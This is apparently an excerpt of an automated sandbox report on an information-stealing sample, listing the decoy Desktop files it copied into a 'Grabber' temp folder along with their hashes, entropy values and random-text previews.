Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696178193607948
Encrypted:	false
SSDEEP:	24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
MD5:	960ECA5919CC00E1B4542A6E039F413E
SHA1:	2079091F1BDF5B543413D549EF9C47C5269659BA
SHA-256:	A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
SHA-512:	57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
Malicious:	false
Preview:	EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\EIVQSAOTAQ.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692024230831571
Encrypted:	false
SSDEEP:	24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
MD5:	086908C2D2FAA8C9284EAB6D70682A47
SHA1:	1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
SHA-256:	40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
SHA-512:	02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
Malicious:	false
Preview:	EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\EWZCVGNOWT.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697358951122591
Encrypted:	false
SSDEEP:	24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
MD5:	244A1B624BD2C9C3A0D660425CB1F3C6
SHA1:	FB6C19991CC49A27F0277F54D88B4522F479BE5F
SHA-256:	E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
SHA-512:	9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
Malicious:	false
Preview:	GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\JDDHMPCDUJ.png

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\PIVFAGEAAV.docx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\PIVFAGEAAV.pdf

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
SSDEEP:	24:e80g32tqxncx15PRgoZOZUxcz6oV0dh0dxiXMK:e87SH5Go0ZeuDufAiXMK
MD5:	3F6896A097F6B0AE6A2BF3826C813DFC
SHA1:	951214AB37DEA766005DD981B0B3D61F936B035B
SHA-256:	E6E3A92151EEE0FCDF549A607AE9E421E9BB081D7B060015A60865E69A2A3D60
SHA-512:	C7BD241F0E71DC29320CC051F649532FFF471B5E617B648CC495413587C06C236AFA4673A7BC77409E989260278CDEF49BDACA38BEB6AF65FEE74C563775B97C
Malicious:	false
Preview:	PIVFAGEAAVVMYOKLIHAGVKQSIBRMIEBPKZHRSRYSYCTZASSEWGQLTFYPITGFBLIMOSZPCOYJLDMIKUYRMFZNOVAKNNFUFMFWAQZIZZSOHPUKTMEQKVMZGORRHHUAPAVEHNTRHFTCOWUQLMTXHFAASXNSJOMVEVZKIBTYUEOEAYWORCLXNWXMWVTCVFUJOOHJFVBTQGYSPLVNZVQAKYRWBXASIFOBPMFAPMAVEFPAYEVCHLKOVGMAFTDZYSFCRVFLUCDEZSALOPZIFCHRCOADKGTQMGRAQFQVFLPTIZCOVQGXVCITLOKGAEHQOUDVVLBLANQIWAMALJXSPVCLVLGENZFIFSPDTQOOAOXTRKMORBXQQUMCVCGJNJNIYGXUUXANSJRSROPOUDFHQHUUMMRXDQWLRABBQAZENYVIBHRRHTGWSIVVUQDLCOQYLVPAUFYYHGIERJJLVMIHLHHCCGHRLMANSNVNAYHLENOWUETBHLULUXLDUIUWHDTSBTXYABZUPEVNUTYDIYOWXZQQWZTIKHRACSWYILZGJJAYPXSWVAJEAMWRWUWIOONUGSOWTNWVILBTRYWXPSGGJYETTQICCTQMOORSZENPULBEQOBSNDWJHFGZOXAYRMRTCQAGZFKLTXQJCKKKJTXRIIVBYSWRFFSDWLAWEVZNFVJIYAKGOFIKGKPALYKLUSFUZNXBTTGJQARLJLEPNMUPZBHUFERZBUARRWLRQMAELUFJHXEPWKNEOUOFWRPCGUFYJEWTUPSXMLBAGQWILTIUMBXONDPOFUHNKJJKISPTLDQHMYGKSUZUEBYHKNHJUVSBOBSFQWTBGVEFNVAAKMXTORQQDIBVTWEQECBUJMCLMNPNRTKIKGQQLCBXEDYYHZALQNWVUKKTUNZMKPSISXIDNZZXVGUERMWOJYWVPNSTVVUORBONVDVVOSICVUMWTQLGBVUNLJTMTSZIJARQMRHCGASSVBBFIRIMTSICIANQBRVHJQBP

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\PIVFAGEAAV\DUUDTUBZFW.jpg

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701195573484743
Encrypted:	false
SSDEEP:	24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
MD5:	2530C45A92F347020337052A8A7D7B00
SHA1:	7EB2D17587824A2ED8BA10D7C7B05E2180120498
SHA-256:	8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
SHA-512:	78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
Malicious:	true
Preview:	DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

C:\Users\user\AppData\Local\Temp\lchlzmhj.erl\Grabber\DRIVE-C\Users\user\Desktop\PIVFAGEAAV\EEGWXUHVUG.xlsx

Process:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690299109915258
Encrypted:	false
SSDEEP:	24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
MD5:	F0D9DE697149ECBC1D88C7EA4841E5BD
SHA1:	06A2A47C12B3554397AA0C8F483411CAB366947D
SHA-256:	5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
SHA-512:	E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
Malicious:	true
Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNR